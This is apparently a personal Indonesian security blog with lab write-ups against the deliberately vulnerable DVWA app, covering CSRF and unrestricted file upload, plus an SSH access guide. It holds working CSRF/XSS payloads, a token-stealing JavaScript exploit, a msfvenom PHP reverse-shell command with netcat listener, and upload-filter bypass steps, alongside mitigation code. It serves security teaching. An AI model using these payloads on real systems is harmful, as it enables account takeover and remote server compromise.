Your Site's RSS Feed

About Mee

Tentang Rizki Triyanto

Ketertarikan utama saya adalah segala sesuatu yang berhubungan dengan teknology khususnya dibidang security. Karena ketertarikan tersebut, seringkali saya menghabiskan waktu yang saya miliki hanya untuk membaca tentang perkembangan yang terjadi setiap harinya dan sesekali mencoba langsung.

Pengalamanku

Cyber Security Specialist

PT Bisa Artifisial Indonesia (BISA AI Academy) | 02/2022 - 07/2022

Koordinator Asisten Praktikum Jaringan Komputer

Departemen Informatika UNDIP | 02/2022 - 06-2022

Junior Programmer Intern

Inkubator Kreasi dan Inovasi Telematika Semarang (IKITAS) | 01/2022 - 03/2022

Koordinator Asisten Praktikum Sistem Operasi

Departemen Informatika UNDIP | 07/2021 - 10/2021

Staf Ahli Penelitian dan Pengembangan

Kabinet Kompas Perubahan | HMIF | 02/2021 - 02/2022

Staf Ahli Penelitian dan Pengembangan

Kabinet Rumah Kita | HMIF | 02/2020 - 02/2021

Sertifikasiku

IT Support Google Specialization

Google x Coursera | 2022 | Credentials

Certified SOC Analyst

EC-Council | 2022 | Credentials

Cisco Certified CyberOps Associate

Cisco | Verification No. 3Q0M5X7FFC441F9W | 2021 | Badge | —Verify Here—

Apsara Clouder - Cloud Security Web Application Attacks And Defense Deep Dive

Alibaba Cloud Certification | Serial No. ACLS07210700054279 | 2021

Apsara Clouder - Cloud Security Malicious Code Mechanism Deep Dive

Alibaba Cloud Certification | Serial No. ACLS10210700053969 | 2021

Project-ku

POS Central AI

BISA AI Academy | 2022

SIAKAD MSIB BISA AI Academy

BISA AI Academy | 2022

Web SIDA JATENG

IKITAS Semarang | 2022

Aplikasi Web si-won (Workout Online)

Mata Kuliah Proyek Perangkat Lunak | 2021

Aplikasi Web Perpustakaan

Mata Kuliah Pengembangan Perbasis Platform | 2021

Website Profil Pribadi v2

Pribadi | 2021 | Link

Website Profil Pribadi v1

Pribadi | 2021 | Link

Pencapaian & Pelatihanku

EC-Council - Certified SOC Analyst Training Program

Synergy Academy | Issued Mar 2022 | See Credential

Belajar Dasar-Dasar DevOps

Issued May 2022 | See Credential

Belajar Fundamental Aplikasi Back-End

Issued May 2022 | See Credential

Dicoding Back-End Pemula

Issued Feb 2022 | See Credential

MITRE ATT&CK Purple Academy by Picus

Issued Jan 2022 | See Credential

Dicoding Architecting on AWS

Issued Jan 2021 | See Credential

Certificate of Competence to qualify as Junior Web Penetration Tester

Issued Sept 2021 | See Credential

Cisco CyberOps Training by Cisco

Issued Sept 2021 | See Credential

Trace Labs OSINT CTF Contestant

Issued Aug 2021 | See Credential

LFS169: Introduction to GitOps

Issued Aug 2021 | See Credential

_dan lain-lain_

Contact Mee

Talk to Rizki Triyanto

Untuk menghubungi saya, silahkan kirimkan email ke rizkitriyanto@protonmail.com. Email tersebut saya gunakan untuk menerima semua email masuk yang berhubungan dengan saya langsung.

Blognya Abah Totooo

Halo, Saya Rizki Triyanto

Situs ini merupakan dokumentasi untuk saya pribadi ketika sedang belajar guna mendapatkan informasi secepat mungkin ketika dibutuhkan sewaktu-waktu.

DVWA Series: CSRF

Fri, 04 Mar 2022 00:00:00 GMT

Intro

DVWA adalah aplikasi web yang dirancang khusus untuk memiliki kerentanan agar kita bisa mempelajarinya. Tujuan dari DVWA adalah mempraktikan beberapa kerentanan web yang umum ditemui dengan berbagai level kesulitan dan antarmuka langsung yang sederhana.

Disclaimer

Apa itu CSRF?

Untuk video pnjelasan yang lebih ringan bisa lihat video berikut:

Dari video tersebut bisa dikatakan bahwa. Cross-Site Request Forgery dikenal juga dengan nama one click attack atau session riding dan biasa disingkat menjadi CSRF atau XSRF. Mudahnya, serangan CSRF ini menipu situs web dengan cara penyerang membuat request yang seolah-olah request tersebut berasal dari user yang dipercaya (korban).

Serangan bekerja melalui link atau script pada halaman web yang diakses oleh user. Link tersebut dapat berupa gambar yang terhubung ke website tertentu.

Jika browser korban menyimpan informasi otentikasi dalam sebuah cookie yang belum expire, maka dengan mengklik ke link tersebut akan menyebabkan website diakses menggunakan cookie victim yang melakukan klik. Dengan kata lain, penyerang menipu browser user untuk mengirimkan HTTP request ke website target.

Sumber : https://portswigger.net/web-security/csrf

Security Level: Low


<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Information Gathering

Terdapat form ubah password admin. Secara default, credetial yang telah diatur untuk DVWA adalah admin:password. Pertama kita kumpulkan informasi dengan mencoba mengganti password kemudian lihat HTTP request dan response menggunakan Burpsuite.

Terlihat bahwa request tersebut menggunakan method GET dan kita bisa tahu parameter yang dikirim ketika melakukan request.

Launch Attack

Karena serangan CSRF ini menipu situs web dengan cara penyerang membuat request yang seolah-olah request tersebut berasal dari user yang dipercaya (korban). Untuk lebih mudahnya kita buat sekenario sebagai berikut. Saya (seorang hacker yang berniat jahat) membuat website untuk diakses oleh korban. Tampilan halaman webnya adalah seperti berikut:

Website tersebut tidak terlihat bebrbahaya. karena korban hanya akan lihat gambar kucing yang lucu. Tapi coba kita lihat source code dibaliknya

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Kucing.com</title>
</head>
<body>
    <h1>Hanya Kucing Tidak Ada Apa-Apa</h1>
    <img src="./maxresdefault.jpg">
    <img style="display: none;" src="http://192.168.1.6/vulnerabilities/csrf/?password_new=testCSRF&password_conf=testCSRF&Change=Change">
</body>
</html>

<img style="display: none;" src="http://192.168.1.6/vulnerabilities/csrf/?password_new=testCSRF&password_conf=testCSRF&Change=Change">

Perhatikan tag img . Alih-alih src yang seharusnya merujuk ke aset gambar (contoh: png atau jpeg), saya membuatnya merujuk (pointing) ke endpoint form perubahan password yang kita tuju dan melakukan perubahan password menjadi “testCSRF”.

Jadi ketika korban mengunjungi website tersebut, ia tidak sadar bahwa sesuatu telah terjadi. Coba kita lihat request yang dilakukan.

Dapat dilihat pada gambar di atas ketika korban mengunjungi website tersebut maka website tersebut akan mengirim request GET untuk mengubah password melalui endpoint yang sebelumnya kita dapatkan. Dan karena request ini berasal dari browser korban, dan asumsikan korban sudah melakukan autentikasi (login), maka PHPSESSID akan terkirim di HTTP cookie-nya.

Sehingga kita sebagai hacker/attacker dapat melakukan login menggunakan password yang baru.

Security Level: Medium


<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Information Gathering

Untuk tantangan level medium, ada pemeriksaan untuk melihat dari mana halaman terakhir yang diminta berasal. Developer membuat validasi dan hanya mempercayai jika cocok dengan domain saat ini, itu harus berasal dari aplikasi web sehingga dapat dipercaya.

Developer menggunakan stripos() berfungsi untuk mencari adanya substring dalam sebuah string (case-insensitive). Dalam kasus ini mungkin developer bermaksud ingin membuat semua request berasal dari website-nya. Terlihat bahwa di baris ke-5 terdapat validasi bahwa jika HTTP_REFERER mengandung kata dari SERVER_NAME maka akan bernilai true dan proses akan dilanjutkan.

Jika kita menggunakan cara sebelumnya, maka proses perubahan password akan gagal karena referer tidak mengandung kata dari server name/host.

Untuk menyelesaikan ini kita perlu memanfaatkan vulnerability lain yaitu XSS

Launch Attack

Kita dapat memanfaatkan salah satunya kerentanan XSS Reflected yaitu kita perlu mengirimkan link kepada korban yang berisi payload. Contoh:

http://192.168.1.6/vulnerabilities/xss_r/?name=<img style="display: none;" src="http://192.168.1.6/vulnerabilities/csrf/?password_new=testCSRF&password_conf=testCSRF&Change=Change">

Kemudian kita encode mengunakan tools URLEncode (silakan ari di google) menjadi:

http://192.168.1.6/vulnerabilities/xss_r/?name=%3Cimg+style%3D%22display%3A+none%3B%22+src%3D%22http%3A%2F%2F192.168.1.6%2Fvulnerabilities%2Fcsrf%2F%3Fpassword_new%3DtestCSRF%26password_conf%3DtestCSRF%26Change%3DChange%22%3E#

payload tersebut biasanya dikirimkan kepada korban setelah diperpendek menggunakan shortener link seperti s.id, bit.ly, tinyurl.com, dll

Coba kita lihat requestnya menggunakan burpsuite.

password berhasil diubah.

Security Level: High


<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Information Gathering

Pada level high ini diketahuii adanya penggunaan token yang setiap kali kita restart halaman akan berubah. Nilai dari parameter ini nantinya akan divalidasi kecocokannya dengan yang ada di server. Ini lah yang dinamakan Anti-CSRF token yang berfungsi untuk memastikan bahwa request dilakuakan secara sah. Jika kita melakukan inspect element pada level high ini, maka akan terlihat bahwa terdapat parameter user_token yang sengaja disembunyikan oleh developer.

user_token ini akan terkirim ketika kita melakukan request.

Sumber: https://systemweakness.com/hackerman-sergio-csrf-tutorial-dvwa-high-security-level-4cba47f2d695

Lunch Attack

Cara Pertama (Memanfaatkan celah Unrestricted File Upload)

Sumber: https://systemweakness.com/hackerman-sergio-csrf-tutorial-dvwa-high-security-level-4cba47f2d695

Jadi skenarionya, kita akan menjalankan file html melalui Unrestricted file upload untuk mendapatkan nilai dari token tersebut, lalu melakukan CSRF untuk merubah password.

Pertama kita buat dulu file html kemudian kita upload dengan memanfaatkan celah unrestricted file upload. Berikut isi file test.html:

<html>
 <body>
  <h1>Kucing Lucu</h1>
  <iframe id="myFrame" src="http://192.168.1.6/vulnerabilities/csrf" style="visibility: hidden;" onload="maliciousPayload()"></iframe>
  <script>
   function maliciousPayload() {
    console.log("start");
    var iframe = document.getElementById("myFrame");
    var doc = iframe.contentDocument  || iframe.contentWindow.document;
    var token = doc.getElementsByName("user_token")[0].value;
    const http = new XMLHttpRequest();
    const url = "http://192.168.1.6/vulnerabilities/csrf/?password_new=testing&password_conf=testing&Change=Change&user_token="+token+"#";
    http.open("GET", url);
    http.send();
    console.log("password changed");
   }
  </script>
 </body>
</html>

kemudian kita kirimkan link menuju file yang kita upload kepada target/korban

http://192.168.1.6/hackable/uploads/test.html

Ketika korban mengakses halaman tersebut maka secara otomatis password akan terganti.

Cara Kedua (Memanfaatkan celah XSS)

sumber: https://hd7exploit.wordpress.com/2017/05/27/dvwa-csrf-high-level/

Jadi skenarionya, kita akan menjalankan JavaScript melalui XSS untuk mendapatkan nilai dari token tersebut, lalu melakukan CSRF untuk merubah password. Pertama kita buat script javascript terlebih dahulu:

var theUrl = 'http://192.168.1.6/vulnerabilities/csrf/';
var pass = 'Cara2-XSS';
if (window.XMLHttpRequest){
    xmlhttp=new XMLHttpRequest();
}else{
    xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.withCredentials = true;
var hacked = false;
xmlhttp.onreadystatechange=function(){
    if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
        var text = xmlhttp.responseText;
        var regex = /user_token\' value\=\'(.*?)\' \/\>/;
        var match = text.match(regex);
        var token = match[1];
        var new_url = 'http://192.168.1.6/vulnerabilities/csrf/?user_token='+token+'&password_new='+pass+'&password_conf='+pass+'&Change=Change'
        if(!hacked){
            //alert('Got token:' + match[1]);
            hacked = true;
            xmlhttp.open("GET", new_url, false );
            xmlhttp.send();
        }
        count++;
    }
};
xmlhttp.open("GET", theUrl, false );
xmlhttp.send();

Selanjutnya kita upload file tersebut ke server yang bisa diakses oleh DVWA contohnya saya menggunakan simple http server dengan alamat http://127.0.0.1:8088/ExploitJS/exploitCSRF.js. Setelah itu lakukan serangan XSS sebagai contoh saya menggunakan XSS DOM dan jalankan script JS yang telah kita buat sebelumnya.

http://192.168.1.6/vulnerabilities/xss_d/?default=English#<script src="http://127.0.0.1:8088/ExploitJS/exploitCSRF.js"></script>

Kemudian kirimkan link tersebut ke target/korban. Maka ketika korban mengeklik link tersebut maka secara otomatis password korban akan terganti.

Menghindari CSRF

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_curr = $_GET[ 'password_current' ];
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Sanitise current password input
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_curr = md5( $pass_curr );

    // Check that the current password is correct
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
    $data->execute();

    // Do both new passwords match and does the current password match the user?
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
        // It does!
        $pass_new = stripslashes( $pass_new );
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database with new password
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->execute();

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match or current password incorrect.</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Menggunakan CSRF-Token yang: - Divalidasi secara ketat dalam setiap kasus sebelum tindakan yang relevan dijalankan. - Terikat ke user session. - gunakan entropi tinggi untuk sessions token secara umum Menyertakan token user-specific rahasia yang ditambahkan ke cookie.

Menggunakan SSL (Secure Socket Layer) and TLS (Transport Layer Security) encryption ketika berurusan dengan data yang sensitive.

Setting dan restrict security terkait HTTP Header, diantaranya Mengatur Content-Security-Policy, Menonaktifkan X-Powered-By, Mengatur Strict-Transport-Security, Mengatur X-XSS-Protection.

Untuk lebih jelasnya silakan kunjungi : Cross-Site Request Forgery Prevention - OWASP Cheat Sheet Series

Akses Server Menggunakan SSH di Windows

Tue, 01 Feb 2022 00:00:00 GMT

Apa itu SSH?

SSH adalah sebuah protokol administrasi yang memungkinkan user untuk mengakses dan memodifikasi berbagai macam pengaturan maupun file yang ada di dalam server. SSH merupakan pengembangan dari Telnet yang sebelumnya dianggap tidak aman karena tidak adanya proses enkripsi.

Akses VPS yang Autentikasinya Menggunakan Password

Dengan jenis otentikasi ini, Server akan meminta kata sandi dari pengguna, kemudian menggunakan kata sandi ini untuk mengotentikasi dirinya ke perangkat jarak jauh (server). Untuk menghubungkan mesin kita (Client) ke Server cukup menggunakan perintah berikut:

ssh user@ipaddress

Akses VPS yang Autentikasinya Menggunakan Public Key

Dalam jenis otentikasi ini, mesin Klien menggunakan pasangan kunci untuk mengotentikasi dirinya ke server. Server akan memverifikasi kunci dengan memeriksa kunci yang diizinkan di folder .ssh di direktori /home.

Dalam kasus ini saya menggunakan VPS Alibaba yang mana otentikasi menggunakan file ber ekstensi *.pem Pertama kita perlu simpan file tersebut di tempat yang aman, kemudian kita perlu membatasi siapa saja yang bisa mengakses. Jika menggunakan Linux kita perlu mengubah hak akses menggunakan perintah chmod 400 key.pem Namun karena pada artikel ini membahas ssh menggunakan windows maka ada cara lain untuk itu yaitu dengan:

Klik kanan file
Pilih Properties -> Security

3. Pilih Advanced -> disabble inheritance

4. Hapus izin akses dan sisakan akun yang aktif saat ini.

Kemudian pada folder tempat menyimpan file public key (disarankan di folder %USERPROFILE%/.ssh) jalankan perintah

ssh -i key.pem user@ipaddress

Akses VPS menggunakan PuTTY

Putty adalah emulator terminal gratis dan open-source, aplikasi transfer file jaringan. Ini mendukung beberapa protokol jaringan, termasuk SCP, SSH, Telnet, rlogin, dan lain-lain.

Untuk mengakses VPS menggunakan PuTTY cukup mudah, jika autentikasi menggunakan password cukup jalankan aplikasi PuTTY dan masukkan Host Name atau IP Addres Server kemudian akan ditanya ingin login sebagai siapa(user) setelah itu tinggal masukkan password.

Jika autentikasi menggunakan public key dan ekstensi filenya adalah .pem maka kita perlu generate terlebih dahulu menggunakan PuTTYgen sehingga nanti menghasilkan file kunci berekstensi *.ppk karena PuTTY hanya menerima key berekstensi *.ppk

Caranya jalankan PuTTYgen. kemudian Load *.pem file

Klik save private key

Kemudaian jalankan PuTTY, dan lakukan setup untuk Otentikasi. Pilih Connection > SSH > Auth

Setelah itu konfigurasikan parameter yang diperlukan untuk terhubung ke instance Linux. Klik Session > masukkan pada kolom hostname atau IP address menggunakan format user@

Klik Open. Jika pesan berikut muncul, Kita sudah masuk ke instance.

Bonus (Buat User Baru)

Untuk menambahkan user baru pada server gunakan perintah:

adduser name_of_user

Setting password user

passwd name_of_user

Kemudian tambahkan user ke suddoers group

Ubuntu server:
usermod -aG sudo name_of_user

CentOS
usermod -aG wheel name_of_user

Untuk berpindah ke user lain menggunakan perintah

su - name_of_user

DVWA Series: Unrestricted File Upload

Thu, 20 Jan 2022 00:00:00 GMT

Intro

Disclaimer

Apa itu Vulnerability File Upload

FFile Upload** merupakan fitur dimana user bisa menggunggah sesuatu ke dalam server. Jika tidak diamankan, fitur ini bisa menjadi sangat berbahaya. Seseorang yang tidak bertanggung jawab, bisa saja menggunggah sesuatu yang bisa mengambil alih atau merusak server tersebut. Celah keamanan ini biasanya disebut Unrestricted File Upload.

Security Level: Low


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

Information Gathering

Terdapat form untuk melakukan upload file. Disana tertulis “Choose an image to upload” dimana kita seharusnya mengupload file gambar. Namun ketika saya coba meng-upload file dengan ekstensi .php, maka file tersebut akan terkirim dan bisa diakses.

Terlihat bahwa tidak ada validasi untuk .php di sini, sehingga kita bisa menfaatkannya untuk menjalankan shell berbahaya.

Launch Attack

Kita dapat menggunakan shell yang sama pada percobaan sebelumnya (Vulnerability file Inclusion) untuk melakukan serangan. Setelah file berhasil terupload kita dapat mengakses shell tersebut melalui path yang telah diberikan pada pesan sukses yaitu

http://192.168.1.6/hackable/uploads/knock.php

Dari situ kita dapat melakukan perintah yang berbahaya.

Dengan payload tersebut kita juga bisa melakukan reverse shell untuk meremote server. Pertama kita sebagai penyerang harus membuat listener bagi shell tersebut menggunakan netcat

netcat -l -p 8888

Langkah kedua, pada shel kita seting IP dan port milik kita

Jika berhasil pada terminal akan tampil sebagai berikut

Menggunakan Metasploit

Kemudian ada cara lain yaitu dengan memanfaatkan tools dari metasploit. Pertama kita perlu membuat file payload yang akan kita gunakan untuk melakukan serangan menggunakan tool msfvenom. Berikut perintahnya:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.7 lport=8888

Keterangan: php/meterpreter/reverse_tcp adalah adalah payload yang akan saya gunakan.

lhost atau listening host adalah IP kita sebagai penyerang

lport atau listening port adalah port yang akan kita gunakan untu listening

Setelah perintah tersebut kita eksekusi, akan muncul script PHP sebagai berikut:

Selanjutnya, adalah membuat file (contohnya payload.php) dan memasukan script tersebut dengan menghilangkan komentar di awal (tanda /*).

Kemudian upload file tersebut

Langkah selanjutnya adalah menyiapkan PC peretas untuk menjadi listener bagi shell yang telah dibuat dengan menggunakan metasploit.

Kemudian akses file payload yang sudah kita upload sehingga session meterpreter dapat terbuka seperti gambar dibawah ini

Dan jika berhasil kita bisa me-remote server tersebut

Security Level: Medium


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

Information Gathering

Jika kita melakukan hal yang sama seperti sebelumnya (meng-upload file ekstensi .php), maka akan muncul pesan error seperti berikut:

Ini karena terdapat validasi, hanya ekstensi JPEG dan PNG saja yang diizinkan.

Launch Attack

Kita masih bisa melakukan serangan dengan melakukan baypass menggunakan Burpsuite.

Pertama, rename file payload kita yang awalnya payload.php menjadi payload.php.jpeg

Kedua, kita lakukan intercept request menggunakan burpsuite dan ubah filename menjadi payload.php

Menjadi

maka file akan berhasil terupload dan menampilkan pesan berhasil

Untuk melakukan reverse shell dapat menggunakan cara yang sama pada level LOW

Security Level: High


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

Information Gathering

Kali ini terdapat tambahan fungsi getimagesize() pada validasi yang digunakan untuk memastikan bahwa file yang di-upload user memang lah gambar.

Lunch Attack

Kita bisa lakukan serangan dengan mengganti file signature dari payload tersebut List of file signatures - Wikipedia

Karena hanya dengan mengubah ekstensi saja tidak akan mengubah jenis file tersebut

Kita ubah signature file tersebut menggunakan hexeditor. Kita ubah hexa dari awalan file tersebut menjadi png Sebelum kita ubah signaturenya. kKita perlu beri 8 kali spasi pada baris pertama

Ubah 8 hexa pertama menjadi 89 50 4E 47 0D 0A 1A 0A

menjadi

kemudian ganti ekstensi menjadi knock.php.png

Setelah itu kita upload.

Sehingga file dapat terupload

Kemidian kita dapat mengakses file tersebut menggunakan celah LFI yang sebelumnya sempat kita bahas. Jangan lupa siapkan listener Netcat.

file:///var/www/html/hackable/uploads/namafile.php.png

Maka akan menampilkan sebagai berikut:

Untuk melakukan reverse shell caranya sama seperti pada level sebelumnya menggunakan netcat

Menghindari Unrestricted File Upload

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
